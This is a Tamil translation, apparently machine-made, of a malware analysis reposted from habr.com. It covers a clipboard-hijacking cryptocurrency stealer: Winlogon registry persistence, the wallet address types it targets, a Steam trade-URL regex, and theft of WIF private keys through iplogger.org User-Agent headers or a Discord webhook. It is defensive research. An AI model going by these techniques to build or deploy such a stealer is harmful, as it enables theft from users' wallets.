நாங்கள் படித்த தீம்பொருளின் பதிப்பு நகலெடுக்கிறது %APPDATA%googleupdater.exe மற்றும் google கோப்பகத்திற்கான "மறைக்கப்பட்ட" பண்புக்கூறை அமைக்கிறது. பின்னர் அவள் மதிப்பை மாற்றுகிறாள் SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell விண்டோஸ் பதிவேட்டில் மற்றும் பாதை சேர்க்கிறது updater.exe. இந்த வழியில், ஒவ்வொரு முறை பயனர் உள்நுழையும் போது தீம்பொருள் செயல்படுத்தப்படும்.
தீங்கிழைக்கும் நடத்தை
கிளிப்பேங்கரைப் போலவே, தீம்பொருளும் கிளிப்போர்டின் உள்ளடக்கங்களைக் கண்காணித்து, கிரிப்டோகரன்சி வாலட் முகவரிகளைத் தேடுகிறது, மேலும் கண்டுபிடிக்கப்பட்டால், அதை ஆபரேட்டரின் முகவரிகளில் ஒன்றை மாற்றுகிறது. குறியீட்டில் உள்ளவற்றின் அடிப்படையில் இலக்கு முகவரிகளின் பட்டியல் கீழே உள்ளது.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ஒவ்வொரு வகை முகவரிக்கும் தொடர்புடைய வழக்கமான வெளிப்பாடு உள்ளது. STEAM_URL மதிப்பு நீராவி அமைப்பைத் தாக்கப் பயன்படுகிறது, இடையகத்தில் வரையறுக்கப் பயன்படுத்தப்படும் வழக்கமான வெளிப்பாட்டிலிருந்து பார்க்க முடியும்:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
வெளியேற்ற சேனல்
பஃபரில் உள்ள முகவரிகளை மாற்றுவதற்கு கூடுதலாக, தீம்பொருள் பிட்காயின், பிட்காயின் கோர் மற்றும் எலக்ட்ரம் பிட்காயின் வாலட்களின் தனிப்பட்ட WIF விசைகளை குறிவைக்கிறது. WIF தனிப்பட்ட விசையைப் பெற, நிரல் plogger.org ஐ வெளியேற்றும் சேனலாகப் பயன்படுத்துகிறது. இதைச் செய்ய, ஆபரேட்டர்கள் கீழே காட்டப்பட்டுள்ளபடி, பயனர் முகவர் HTTP தலைப்பில் தனிப்பட்ட விசைத் தரவைச் சேர்க்கிறார்கள்.
படம் 4. வெளியீட்டுத் தரவுகளுடன் IP லாகர் கன்சோல்.
ஆபரேட்டர்கள் பணப்பையை வெளியேற்ற iplogger.org ஐப் பயன்படுத்தவில்லை. புலத்தில் 255 எழுத்து வரம்பு இருப்பதால் அவர்கள் வேறு முறையை நாடியிருக்கலாம் User-AgentIP லாகர் இணைய இடைமுகத்தில் காட்டப்படும். நாங்கள் ஆய்வு செய்த மாதிரிகளில், பிற வெளியீட்டு சேவையகம் சூழல் மாறியில் சேமிக்கப்பட்டது DiscordWebHook. ஆச்சரியப்படும் விதமாக, இந்த சூழல் மாறி குறியீட்டில் எங்கும் ஒதுக்கப்படவில்லை. மால்வேர் இன்னும் வளர்ச்சியில் உள்ளது என்றும், ஆபரேட்டரின் சோதனை இயந்திரத்திற்கு மாறி ஒதுக்கப்பட்டுள்ளது என்றும் இது அறிவுறுத்துகிறது.
திட்டம் வளர்ச்சியில் உள்ளது என்பதற்கு மற்றொரு அறிகுறி உள்ளது. பைனரி கோப்பில் இரண்டு iplogger.org URLகள் உள்ளன, மேலும் இரண்டும் தரவு வெளியேற்றப்படும்போது வினவப்படும். இந்த URL களில் ஒன்றிற்கான கோரிக்கையில், பரிந்துரையாளர் புலத்தில் உள்ள மதிப்பு "DEV /"க்கு முன்னதாக இருக்கும். ConfuserExஐப் பயன்படுத்தி தொகுக்கப்படாத பதிப்பையும் கண்டறிந்துள்ளோம், இந்த URLஐப் பெறுபவரின் பெயர் DevFeedbackUrl. சூழல் மாறிப் பெயரின் அடிப்படையில், கிரிப்டோகரன்சி வாலட்களைத் திருட, முறையான சேவையான டிஸ்கார்ட் மற்றும் அதன் இணைய இடைமறிப்பு முறையைப் பயன்படுத்த ஆபரேட்டர்கள் திட்டமிட்டுள்ளதாக நாங்கள் நம்புகிறோம்.
முடிவுக்கு
சைபர் தாக்குதல்களில் முறையான விளம்பரச் சேவைகளைப் பயன்படுத்துவதற்கு இந்தப் பிரச்சாரம் ஒரு எடுத்துக்காட்டு. இந்தத் திட்டம் ரஷ்ய அமைப்புகளை குறிவைக்கிறது, ஆனால் ரஷ்யர் அல்லாத சேவைகளைப் பயன்படுத்தி இதுபோன்ற தாக்குதலைக் கண்டு நாங்கள் ஆச்சரியப்பட மாட்டோம். சமரசத்தைத் தவிர்க்க, பயனர்கள் தாங்கள் பதிவிறக்கும் மென்பொருளின் மூலத்தின் நற்பெயரில் நம்பிக்கையுடன் இருக்க வேண்டும்.
சமரசம் மற்றும் MITER ATT&CK பண்புக்கூறுகளின் முழுமையான பட்டியல் இங்கே கிடைக்கிறது .
ஆதாரம்: www.habr.com